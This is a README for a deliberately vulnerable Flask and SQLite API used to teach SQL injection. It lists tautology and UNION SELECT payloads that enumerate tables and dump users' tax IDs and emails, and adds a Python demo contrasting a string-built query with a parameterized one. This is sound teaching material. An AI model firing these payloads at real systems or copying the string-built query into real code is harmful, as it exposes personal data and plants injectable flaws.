Flask Vulnerable to SQL Injection 💉🔓


The purpose of this repository is to allow us to explore an API vulnerable to SQL Injection (using Python, Flask, and SQLite).

You're free to play with it as is, but you might have more fun doing it alongside me in a blog post: https://blog.guilatrova.dev/how-sql-injection-attack-works-with-examples/.

You can play with the following endpoints (assuming the app is running on localhost):

| Endpoint | Description |
| --- | --- |
| `/challenges/111.111.111-11` | Expected usage |
| `/challenges/' or '1' = '1` | Vulnerability proof |
| `/challenges/' AND '1' = '2' UNION SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%` | Breaks server |
| `/challenges/' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%` | Queries all tables and fixes broken server |
| `/challenges/' AND '1' = '2' UNION SELECT cpf, email FROM users; --` | Use union select to query data from other tables |
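
The same five path values run against a string-built query and a parameterized one, as an added example that is not code from this repository. The `challenges` table, its columns and the sample rows are assumptions; only `users.cpf` and `users.email` appear above.

```python
import sqlite3

# Constructed schema: the page names only users.cpf and users.email; the
# challenges table, its columns and all rows are assumptions for this example.
SCHEMA = """
CREATE TABLE users (cpf TEXT, email TEXT);
CREATE TABLE challenges (cpf TEXT, title TEXT, score INTEGER);
INSERT INTO users VALUES ('111.111.111-11', 'a@example.test'),
                         ('222.222.222-22', 'b@example.test');
INSERT INTO challenges VALUES ('111.111.111-11', 'intro', 10),
                              ('222.222.222-22', 'advanced', 90);
"""

# Path segments copied from the endpoint table above.
INPUTS = {
    "expected": "111.111.111-11",
    "tautology": "' or '1' = '1",
    "union_1col": "' AND '1' = '2' UNION SELECT name FROM sqlite_master "
                  "WHERE type ='table' AND name NOT LIKE 'sqlite_%",
    "union_2col": "' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master "
                  "WHERE type = 'table' AND name NOT LIKE 'sqlite_%",
    "union_users": "' AND '1' = '2' UNION SELECT cpf, email FROM users; --",
}

def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def lookup_vulnerable(db, cpf):
    # The value is pasted into the SQL text, so a quote in it ends the string
    # literal and everything after it is parsed as SQL.
    return db.execute(f"SELECT title, score FROM challenges WHERE cpf = '{cpf}'").fetchall()

def lookup_safe(db, cpf):
    # Bound parameter: the value is compared as data and never parsed as SQL.
    return db.execute("SELECT title, score FROM challenges WHERE cpf = ?", (cpf,)).fetchall()

def run(lookup, value):
    """Return the rows, or the database error an unhandled request would turn into a 500."""
    try:
        return lookup(make_db(), value)
    except sqlite3.Error as exc:
        return f"error: {exc}"

if __name__ == "__main__":
    for name, value in INPUTS.items():
        print(name, run(lookup_vulnerable, value), run(lookup_safe, value), sep="\n  ")
```

The one-column `UNION` fails because both sides of a `UNION` must return the same number of columns, which is why that row is labelled "Breaks server"; with the bound parameter every row except the expected one returns an empty result.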